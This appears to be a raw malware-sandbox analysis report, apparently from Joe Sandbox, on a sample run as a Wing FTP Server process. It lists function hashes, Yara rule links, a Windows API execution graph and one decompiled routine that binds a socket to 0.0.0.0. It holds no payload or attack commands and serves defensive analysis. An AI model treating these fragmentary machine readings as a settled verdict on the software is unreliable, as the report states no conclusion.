                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10E0C03AA047208FC300EA24F8107EFBBBA8BCD13130142A7EC45C33C2CA288E0083E1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B73229 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 27d8b542c2bdd3a62f13cefbda9b135c41718578c9fdda5796cba777aaa8515b
                                                                                                                                                                                                  • Instruction ID: ba9ef3d09af05b357b8afc1f0f7efbaf58bcce23d0481b79f64b44638fd5caba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27d8b542c2bdd3a62f13cefbda9b135c41718578c9fdda5796cba777aaa8515b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0A039B051458FD318DFA8E15CA25FBA1FF80219F0982EED84E4B612C721E8A4C7C0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B73401 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0c11a0292425a9807e5e3419a9a112cc215da141526b85eb98446c74e94dd07d
                                                                                                                                                                                                  • Instruction ID: e24708c3d8a29e9a9e24552854d938ddd4cf09e5cdbd58596a4d94c97cb77098
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c11a0292425a9807e5e3419a9a112cc215da141526b85eb98446c74e94dd07d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BE026327081A04BC71E6B39B0686FEBBBACFC475970800AAE00AD3245CF60CD038B81
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B70658 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1833efddf435cd8026fd67f323b0668ad3c583ee978ca8dc7b151f6a2e1e3cd0
                                                                                                                                                                                                  • Instruction ID: ddc6644d27f86fb18ed32432b4de5cde0509dbc4cda8f3c4df78218ca7f13707
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1833efddf435cd8026fd67f323b0668ad3c583ee978ca8dc7b151f6a2e1e3cd0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20E0CD3130471657C7247A6AE61C55677EDEFC472D305057AD41DD7644DF60DC0187D4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B73192 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 66f92f15d9d6addba59ac6e37ceb58cf5fb49974cc7d0390d9bf633958df19f9
                                                                                                                                                                                                  • Instruction ID: 0c337a90abbf8f7311fecf9585ff94403aef074fc16cd122fa05f0a0ba501747
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f92f15d9d6addba59ac6e37ceb58cf5fb49974cc7d0390d9bf633958df19f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E09274B04148AFCB11CB64D8589ECB7B1EF05208F0C88A5E414DB191C730D545CB50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B75193 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 122136ac435c440fd46ae72f0978cc43f5cd4432e7ab307bfe802fd85f2efee5
                                                                                                                                                                                                  • Instruction ID: 5c64a32e9a86837fe34495b93b5a21c63f0669a93fc25d3c7b90a0253dc9705c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 122136ac435c440fd46ae72f0978cc43f5cd4432e7ab307bfe802fd85f2efee5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E0E6B0D40209DED750DF78D51535EBBF0BB04204F24897AC019E6645E77542058F91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B75198 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 84e71b09fe9681f24eeccf1c800b491d69c4483ab9ec3b554b6f1d8b3166fee1
                                                                                                                                                                                                  • Instruction ID: d8a2d9ec94de1c99e2266223ea482aa0850009ab063bcc0dbb92a82c8fc5d7fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84e71b09fe9681f24eeccf1c800b491d69c4483ab9ec3b554b6f1d8b3166fee1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8E0ECB0D003099ED790EFA9D4117AEBBF0BB04204F2089BAC025E6641E77556058F91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B72CE8 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e07b9c32ba09d229c004cf04cd48cda97764be433fa880072c4b1b11cd9ecd60
                                                                                                                                                                                                  • Instruction ID: fb1ca0129e060051c9ffcbd77936ebf7ac1b1a31e806fca141b193883700005f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07b9c32ba09d229c004cf04cd48cda97764be433fa880072c4b1b11cd9ecd60
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FD0C9B49047009AAB0CDF1A894003679E5FEC430C370CDFE501989216D735C6039A92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B73768 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f38893b968233554f9e643d93987839d2ea4c765dfb1269ad6f078e20158d478
                                                                                                                                                                                                  • Instruction ID: 85944cc51e7bcc488d6ee75ca4517909fd28f98998ca05c3cec5d658714b2451
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f38893b968233554f9e643d93987839d2ea4c765dfb1269ad6f078e20158d478
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CA0025D56D115A51541F2A9567A96A0081FE5221DBC61EE1913996505CD0C55005493
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 03D2E850 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 731d5b791e84ce8121d58f4c1db85c9853072a1201d5ba2c6988e0a91a40918c
                                                                                                                                                                                                  • Instruction ID: 0c0fb90702117eea87a37ecc13dc986228c8b6f89ba1e0c602123cc6b6eb0345
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 731d5b791e84ce8121d58f4c1db85c9853072a1201d5ba2c6988e0a91a40918c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D916A70E002288FDB10CFA9C9857DEFFF2BF98718F188529E455AB254DB749845CB85
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:13.1%
                                                                                                                                                                                                  Total number of Nodes:306
                                                                                                                                                                                                  Total number of Limit Nodes:16
                                                                                                                                                                                                  execution_graph 20446 3acfba0 VariantChangeType 20589 3bc4db0 18 API calls 20449 3ad93b8 125 API calls 20450 3aa83b3 13 API calls 20591 3ac15b0 ReadFile 20592 3ad01b0 GetProcAddress GetModuleHandleW 20595 3bc4598 22 API calls 20452 3bc4b94 8 API calls 20596 3aa7580 11 API calls 20167 3ac7d9c 20180 3aaa044 20167->20180 20169 3ac7dcc 20170 3ac7de0 GetFileVersionInfoSizeW 20169->20170 20171 3ac7e86 20170->20171 20174 3ac7df0 20170->20174 20185 3aa9c1c 20171->20185 20175 3ac7e19 GetFileVersionInfoW 20174->20175 20176 3ac7e3d 20175->20176 20177 3ac7e23 VerQueryValueW 20175->20177 20184 3aa6eac 11 API calls 20176->20184 20177->20176 20179 3ac7e7e 20182 3aaa048 20180->20182 20181 3aaa06c 20181->20169 20182->20181 20189 3aa6eac 11 API calls 20182->20189 20184->20179 20186 3aa9c22 20185->20186 20188 3aa9c3d 20185->20188 20186->20188 20190 3aa6eac 11 API calls 20186->20190 20189->20181 20190->20188 20599 3aae998 50 API calls 20604 3ac15e8 WriteFile 20457 3aac3f8 59 API calls 20458 3aebffc 63 API calls 20459 3ac9bf4 63 API calls 20191 3aa65c8 20192 3aa65d9 20191->20192 20194 3aa65de 20191->20194 20195 3aa6514 20192->20195 20196 3aa655c 20195->20196 20197 3aa651d 20195->20197 20198 3aa657d 20196->20198 20199 3aa6565 VirtualAlloc 20196->20199 20197->20196 20200 3aa6528 Sleep 20197->20200 20198->20194 20199->20198 20200->20196 20201 3aa6542 Sleep 20200->20201 20201->20197 20609 3ac9dc8 SetErrorMode LoadLibraryW 20461 3acf3c0 VerSetConditionMask VerifyVersionInfoW 20462 3ac77c0 107 API calls 20464 3ac5bdc 121 API calls 20613 3aeb9dc 60 API calls 20616 3ad9dd8 110 API calls 20467 3aaefd0 12 API calls 20617 3ac3d2c 13 API calls 20472 3ac9324 GetCurrentThreadId 20619 3ac6d24 90 API calls 20622 3aed93c 155 API calls 20475 3ac1f38 105 API calls 20628 3aec930 106 API calls 20629 3bc511c 175 API calls 20631 3bc5d1c 127 API calls 20480 3ab1b18 48 API calls 20481 3ac6b18 118 API calls 20483 3aaff1c 12 API calls 20634 3ac5052 12 API calls 20388 3aa596c 20389 3aa5bcc 20388->20389 20391 3aa5984 20388->20391 20390 3aa5ce4 20389->20390 20392 3aa5b90 20389->20392 20393 3aa5718 VirtualAlloc 20390->20393 20394 3aa5ced 20390->20394 20400 3aa5996 20391->20400 20403 3aa5a21 Sleep 20391->20403 20398 3aa5baa Sleep 20392->20398 20404 3aa5bea 20392->20404 20396 3aa5753 20393->20396 20397 3aa5743 20393->20397 20395 3aa59a5 20412 3aa56cc Sleep Sleep 20397->20412 20402 3aa5bc0 Sleep 20398->20402 20398->20404 20400->20395 20401 3aa5a84 20400->20401 20406 3aa5a65 Sleep 20400->20406 20411 3aa5a90 20401->20411 20413 3aa5650 20401->20413 20402->20392 20403->20400 20405 3aa5a37 Sleep 20403->20405 20407 3aa5650 VirtualAlloc 20404->20407 20408 3aa5c08 20404->20408 20405->20391 20406->20401 20410 3aa5a7b Sleep 20406->20410 20407->20408 20410->20400 20412->20396 20417 3aa55e4 20413->20417 20415 3aa5659 VirtualAlloc 20416 3aa5670 20415->20416 20416->20411 20418 3aa5584 20417->20418 20418->20415 20638 3aaf57c 27 API calls 20639 3bc4964 13 API calls 20491 3ac834c SetLastError 20646 3ab0d48 FreeLibrary LocalFree 20493 3bc4f58 20 API calls 20647 3af2548 107 API calls 20497 3bc4750 120 API calls 20649 3acfd58 107 API calls 20652 3bc4d40 SysFreeString SysFreeString SysAllocStringLen OpenSCManagerW OpenServiceW 20501 3ad9f50 50 API calls 20655 3bac945 12 API calls 20656 3bc48bc 14 API calls 20504 3acf6a8 108 API calls 20658 3ad9ca8 49 API calls 20419 3bcd0b0 20424 3ab0a1c 20419->20424 20425 3ab0a27 20424->20425 20429 3aa9600 20425->20429 20427 3ab0a67 20428 3aa994c 11 API calls 20427->20428 20430 3aa960f 20429->20430 20431 3aa9614 GetCurrentThreadId 20429->20431 20430->20431 20432 3aa964a 20431->20432 20432->20427 20433 3aa9962 20432->20433 20434 3aa9973 20432->20434 20444 3aa98b4 GetStdHandle WriteFile GetStdHandle WriteFile 20433->20444 20435 3aa997c GetCurrentThreadId 20434->20435 20439 3aa9989 20434->20439 20435->20439 20437 3aa996c 20437->20434 20438 3aa6f54 11 API calls 20438->20439 20439->20438 20440 3aa9a23 FreeLibrary 20439->20440 20441 3aa9a4b 20439->20441 20440->20439 20442 3aa9a5a ExitProcess 20441->20442 20443 3aa9a54 20441->20443 20443->20442 20444->20437 20508 3ab92b8 12 API calls 20663 3ace4b0 MultiByteToWideChar 20512 3ac1a8c GetDiskFreeSpaceW 20669 3ac90ec 107 API calls 20202 3aac4e8 20203 3aac4f8 GetModuleFileNameW 20202->20203 20204 3aac514 20202->20204 20206 3aad774 GetModuleFileNameW 20203->20206 20207 3aad7c2 20206->20207 20216 3aad650 20207->20216 20209 3aad7ee 20210 3aad808 20209->20210 20212 3aad800 LoadLibraryExW 20209->20212 20242 3aa9c7c 20210->20242 20212->20210 20214 3aa9c1c 11 API calls 20215 3aad82d 20214->20215 20215->20204 20217 3aad671 20216->20217 20218 3aa9c1c 11 API calls 20217->20218 20219 3aad68e 20218->20219 20220 3aad6f9 20219->20220 20221 3aaa044 11 API calls 20219->20221 20222 3aa9c7c 11 API calls 20220->20222 20225 3aad6a3 20221->20225 20223 3aad766 20222->20223 20223->20209 20224 3aad6d4 20246 3aad374 20224->20246 20225->20224 20311 3aaacbc 20225->20311 20229 3aad6fb GetUserDefaultUILanguage 20254 3aacd24 EnterCriticalSection 20229->20254 20230 3aad6ec 20232 3aad4a0 13 API calls 20230->20232 20232->20220 20236 3aad73d 20236->20220 20293 3aad584 20236->20293 20237 3aad723 GetSystemDefaultUILanguage 20238 3aacd24 28 API calls 20237->20238 20240 3aad730 20238->20240 20241 3aad4a0 13 API calls 20240->20241 20241->20236 20243 3aa9c82 20242->20243 20244 3aa9ca8 20243->20244 20379 3aa6eac 11 API calls 20243->20379 20244->20214 20247 3aad3a8 20246->20247 20248 3aad396 20246->20248 20252 3aa9c1c 11 API calls 20247->20252 20315 3aad058 20248->20315 20250 3aad3a0 20339 3aad3d8 18 API calls 20250->20339 20253 3aad3ca 20252->20253 20253->20229 20253->20230 20255 3aacd70 LeaveCriticalSection 20254->20255 20256 3aacd50 20254->20256 20257 3aa9c1c 11 API calls 20255->20257 20258 3aacd61 LeaveCriticalSection 20256->20258 20259 3aacd81 IsValidLocale 20257->20259 20260 3aace12 20258->20260 20261 3aacddf EnterCriticalSection 20259->20261 20262 3aacd90 20259->20262 20266 3aa9c1c 11 API calls 20260->20266 20263 3aacdf7 20261->20263 20264 3aacd99 20262->20264 20265 3aacda4 20262->20265 20272 3aace08 LeaveCriticalSection 20263->20272 20342 3aacc08 17 API calls 20264->20342 20343 3aaca0c 14 API calls 20265->20343 20269 3aace27 20266->20269 20279 3aad4a0 20269->20279 20270 3aacda2 20270->20261 20271 3aacdad GetSystemDefaultUILanguage 20271->20261 20273 3aacdb7 20271->20273 20272->20260 20274 3aacdc8 GetSystemDefaultUILanguage 20273->20274 20344 3aa9ffc 11 API calls 20273->20344 20345 3aaca0c 14 API calls 20274->20345 20277 3aacdd5 20346 3aa9ffc 11 API calls 20277->20346 20280 3aad4bf 20279->20280 20281 3aa9c1c 11 API calls 20280->20281 20290 3aad4dd 20281->20290 20282 3aad54b 20283 3aa9c1c 11 API calls 20282->20283 20284 3aad553 20283->20284 20285 3aa9c1c 11 API calls 20284->20285 20286 3aad568 20285->20286 20287 3aa9c7c 11 API calls 20286->20287 20289 3aad575 20287->20289 20288 3aaacbc 11 API calls 20288->20290 20289->20236 20289->20237 20290->20282 20290->20284 20290->20288 20347 3aaab4c 20290->20347 20358 3aad434 20290->20358 20368 3aa9d00 20293->20368 20296 3aad5d4 20297 3aaab4c 11 API calls 20296->20297 20298 3aad5e1 20297->20298 20299 3aad434 13 API calls 20298->20299 20303 3aad5e8 20299->20303 20300 3aad621 20301 3aa9c7c 11 API calls 20300->20301 20302 3aad63b 20301->20302 20304 3aa9c1c 11 API calls 20302->20304 20303->20300 20305 3aaab4c 11 API calls 20303->20305 20306 3aad643 20304->20306 20307 3aad60f 20305->20307 20306->20220 20308 3aad434 13 API calls 20307->20308 20309 3aad616 20308->20309 20309->20300 20310 3aa9c1c 11 API calls 20309->20310 20310->20300 20312 3aaacc7 20311->20312 20370 3aa9da4 20312->20370 20316 3aad06f 20315->20316 20317 3aad083 GetModuleFileNameW 20316->20317 20318 3aad098 20316->20318 20317->20318 20319 3aad0c0 RegOpenKeyExW 20318->20319 20320 3aad267 20318->20320 20322 3aad181 20319->20322 20323 3aad0e7 RegOpenKeyExW 20319->20323 20321 3aa9c1c 11 API calls 20320->20321 20325 3aad27c 20321->20325 20340 3aace68 7 API calls 20322->20340 20323->20322 20326 3aad105 RegOpenKeyExW 20323->20326 20325->20250 20326->20322 20328 3aad123 RegOpenKeyExW 20326->20328 20327 3aad19f RegQueryValueExW 20330 3aad1bd 20327->20330 20331 3aad1f0 RegQueryValueExW 20327->20331 20328->20322 20329 3aad141 RegOpenKeyExW 20328->20329 20329->20322 20332 3aad15f RegOpenKeyExW 20329->20332 20335 3aad1c5 RegQueryValueExW 20330->20335 20333 3aad20c 20331->20333 20338 3aad1ee 20331->20338 20332->20320 20332->20322 20337 3aad214 RegQueryValueExW 20333->20337 20334 3aad256 RegCloseKey 20334->20250 20334->20320 20335->20338 20337->20338 20338->20334 20341 3aa6eac 11 API calls 20338->20341 20339->20247 20340->20327 20341->20334 20342->20270 20343->20271 20344->20274 20345->20277 20346->20261 20348 3aaab50 20347->20348 20352 3aaabbe 20347->20352 20349 3aaab58 20348->20349 20353 3aa9ffc 20348->20353 20349->20352 20355 3aaab67 20349->20355 20366 3aa9ffc 11 API calls 20349->20366 20350 3aaa040 20350->20290 20352->20352 20353->20350 20365 3aa6eac 11 API calls 20353->20365 20355->20352 20367 3aa9ffc 11 API calls 20355->20367 20357 3aaabba 20357->20290 20359 3aad449 20358->20359 20360 3aad466 FindFirstFileW 20359->20360 20361 3aad47c 20360->20361 20362 3aad476 FindClose 20360->20362 20363 3aa9c1c 11 API calls 20361->20363 20362->20361 20364 3aad491 20363->20364 20364->20290 20365->20350 20366->20355 20367->20357 20369 3aa9d04 GetUserDefaultUILanguage GetLocaleInfoW 20368->20369 20369->20296 20371 3aa9db4 20370->20371 20374 3aa9c40 20371->20374 20375 3aa9c46 20374->20375 20377 3aa9c61 20374->20377 20375->20377 20378 3aa6eac 11 API calls 20375->20378 20377->20224 20378->20377 20379->20243 20675 3aaf0e4 7 API calls 20676 3ab00e4 WideCharToMultiByte 20526 3ad96fc 106 API calls 20678 3ad1cf4 154 API calls 20531 3aa7ac8 13 API calls 20532 3aa96c8 75 API calls 20682 3ad84c2 113 API calls 20683 3acccdc 93 API calls 20537 3ab02d8 52 API calls 20538 3aa9adc 12 API calls 20689 3ac982c 106 API calls 20546 3ac1620 SetFilePointer GetLastError 20549 3aa7a38 13 API calls 20550 3bac628 16 API calls 20554 3acfe38 60 API calls 20555 3aebe38 66 API calls 20698 3aae830 25 API calls 20560 3ac8604 120 API calls 20704 3bac810 57 API calls 20706 3ace018 96 API calls 20561 3ac4e19 13 API calls 20565 3bc4a7c 11 API calls 20713 3bc4c7c 9 API calls 20380 3bc5078 WSAStartup 20381 3bc5098 WSACleanup 20380->20381 20382 3bc50a1 socket 20380->20382 20383 3bc5109 20381->20383 20384 3bc50bc htons inet_addr bind 20382->20384 20385 3bc50b3 WSACleanup 20382->20385 20386 3bc50f8 closesocket WSACleanup 20384->20386 20385->20383 20386->20383 20571 3ad9a74 94 API calls 20572 3aaea70 55 API calls 20577 3ac9248 51 API calls 20580 3bc4a54 SysFreeString 20585 3ab0e58 9 API calls

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 03BC5078 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 51networkCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                                                  			E03BC5078(signed short _a4) {
				char _v404;
				signed int _v416;
				signed int _v418;
				char _v420;
				char* _t7;
				signed int _t8;
				char* _t9;
				void* _t12;
				char* _t13;

				_t7 =  &_v404;
				_push(_t7);
				_push(0x202); // executed
				L03ACF7D8(); // executed
				if(_t7 == 0) {
					_push(6);
					_push(1);
					_push(2); // executed
					L03ACF7D0(); // executed
					_t13 = _t7;
					if(_t13 != 0xffffffff) {
						_v420 = 2;
						_t8 = _a4 & 0x0000ffff;
						_push(_t8);
						L03ACF7C0();
						_v418 = _t8;
						_push("0.0.0.0");
						L03ACF7C8();
						_v416 = _t8;
						_push(0x10);
						_t9 =  &_v420;
						_push(_t9);
						_push(_t13); // executed
						L03ACF7B0(); // executed
						if(_t9 + 1 != 0) {
							_t12 = 1;
						} else {
							_t12 = 0;
						}
						_push(_t13);
						L03ACF7B8();
						L03ACF7E0();
					} else {
						L03ACF7E0();
						_t12 = 0;
					}
				} else {
					L03ACF7E0();
					_t12 = 0;
				}
				return _t12;
			}












                                                                                                                                                                                                  0x03bc5083
                                                                                                                                                                                                  0x03bc5089
                                                                                                                                                                                                  0x03bc508a
                                                                                                                                                                                                  0x03bc508f
                                                                                                                                                                                                  0x03bc5096
                                                                                                                                                                                                  0x03bc50a1
                                                                                                                                                                                                  0x03bc50a3
                                                                                                                                                                                                  0x03bc50a5
                                                                                                                                                                                                  0x03bc50a7
                                                                                                                                                                                                  0x03bc50ac
                                                                                                                                                                                                  0x03bc50b1
                                                                                                                                                                                                  0x03bc50bc
                                                                                                                                                                                                  0x03bc50c5
                                                                                                                                                                                                  0x03bc50c9
                                                                                                                                                                                                  0x03bc50ca
                                                                                                                                                                                                  0x03bc50cf
                                                                                                                                                                                                  0x03bc50d6
                                                                                                                                                                                                  0x03bc50db
                                                                                                                                                                                                  0x03bc50e0
                                                                                                                                                                                                  0x03bc50e6
                                                                                                                                                                                                  0x03bc50e8
                                                                                                                                                                                                  0x03bc50ee
                                                                                                                                                                                                  0x03bc50ef
                                                                                                                                                                                                  0x03bc50f0
                                                                                                                                                                                                  0x03bc50f6
                                                                                                                                                                                                  0x03bc50fc
                                                                                                                                                                                                  0x03bc50f8
                                                                                                                                                                                                  0x03bc50f8
                                                                                                                                                                                                  0x03bc50f8
                                                                                                                                                                                                  0x03bc50fe
                                                                                                                                                                                                  0x03bc50ff
                                                                                                                                                                                                  0x03bc5104
                                                                                                                                                                                                  0x03bc50b3
                                                                                                                                                                                                  0x03bc50b3
                                                                                                                                                                                                  0x03bc50b8
                                                                                                                                                                                                  0x03bc50b8
                                                                                                                                                                                                  0x03bc5098
                                                                                                                                                                                                  0x03bc5098
                                                                                                                                                                                                  0x03bc509d
                                                                                                                                                                                                  0x03bc509d
                                                                                                                                                                                                  0x03bc5110

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WSAStartup.WSOCK32(00000202,?), ref: 03BC508F
                                                                                                                                                                                                  • WSACleanup.WSOCK32(00000202,?), ref: 03BC5098
                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000202,?), ref: 03BC50A7
                                                                                                                                                                                                  • WSACleanup.WSOCK32(00000002,00000001,00000006,00000202,?), ref: 03BC50B3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Cleanup$Startupsocket
                                                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                                                  • API String ID: 3412503511-3771769585
                                                                                                                                                                                                  • Opcode ID: 9ff846075db4e42e4b64825657a59ce86cfd3611c3b8849550859a423431b274
                                                                                                                                                                                                  • Instruction ID: 72e5bc20aeb67a1bd4b964cbcef1a938c3b1986e2538a8b911f8160254c57c8c
